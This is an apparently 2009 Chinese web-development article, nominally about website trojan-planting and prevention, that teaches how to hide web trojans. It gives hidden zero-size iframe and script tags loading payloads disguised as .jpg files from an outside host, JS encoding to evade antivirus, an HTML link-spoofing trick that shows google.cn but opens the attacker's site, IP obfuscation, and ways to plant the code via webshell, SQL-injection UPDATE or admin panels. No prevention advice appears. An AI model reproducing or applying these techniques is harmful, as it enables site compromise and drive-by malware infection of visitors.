了解常用集中网站挂马和防范方法
2009-04-08 13:59:13 来源:WEB开发网挂马首先要求的是隐蔽性,这样挂的时间才能长。像在SWF、JS、RM中挂马就是比较隐蔽了,但是还可再用到些技巧。
(1)远程任意后缀执行HTML
可以把horse.html改成horse.jpg之类的后缀,然后语句写成<iframesrc=/uploadfile/200902 /20090220105353594.jpg width=0 height=0></iframe>。js也可以,语句为<script src=http://tech.ddvip.com/uploadfile/200902/20090220105353594.jpg></script>,甚至js的不要后缀名都可以。
2)JS的加密
为了保护网页木马的代码,可以把JS内容加密,还能躲开杀软的作用。如果使用ENCODE加密方式,加密后的JS调用语句就用<scriptlanguage=”jscript”.encode”src=http://www.arthack.org/horse.txt& gt;</script>。除此方法外,还有其它更多的方法!
(3)URL的变形
URL的变形方法也有很多,例如将url的16进制转换为encod编码等。如果是涉及到URL欺骗的方法就更多了,不过多数的URL欺骗,像利用@的技巧,IE都已经打补丁了。但现在有个漏洞仍然有效,代码如下:
<a id=”CZY” href=http://www.arthack.org”></a>
<div>
<a href=http://www.google.cn” target=”_blank”>
<table>
<caption>
<a href=http://www.google.cn” target=”_blank”>
<label for=”CZY”>
<u style=”cursor: pointer: color: blue”>
Google</u>
</label></a></caption></table></a></div>
保存该代码为网页后,鼠标移动到Google这个链接上时,IE状态栏显示的http://www.google.cn,但点击链接后却打开 http://www.arthack.org网站。如果你的网马可以用IP地址访问到的话,IP地址也可以进行转换的。像127.0.0.1这样的IP 还可以 变为 2130706433、0×7f.0×00.0×00.0×01、0177.0000.0000.0001等等,这只不过是8进制、10进制、16进制、的转换而已。
3、如何才能挂到马
拿到了webshell的话,挂马自然是很简单了。但是拿不到的情况下,如果注入点有update权限,我们可以仔细查找首页中的某条新闻的调用链接,然后update数据库达到我们的目的。如果可进入后台,我没就可以在一些发公告的地方写入自己的木马代码(不过千万别打乱前台html源文件里的代码逻辑)。
- ››常用诺基亚S60手机软件应用
- ››常用iPhone手机软件应用
- ››了解Windows Mobile文件结构
- ››常用 Java Profiling 工具的分析与比较
- ››常用JS验证函数总结
- ››了解 IBM Smart Business Development and Test o...
- ››常用CentOS vsftpd安装设置讲解
- ››常用的Linux shell命令详解
- ››了解 Apache Click:使用轻量模型快速编写 Web 应...
- ››常用Windows任务管理器进程详解
- ››了解 IBM Data Studio Version 2 软件打包方式
- ››了解微软Office 2010数字签名的新特性
赞助商链接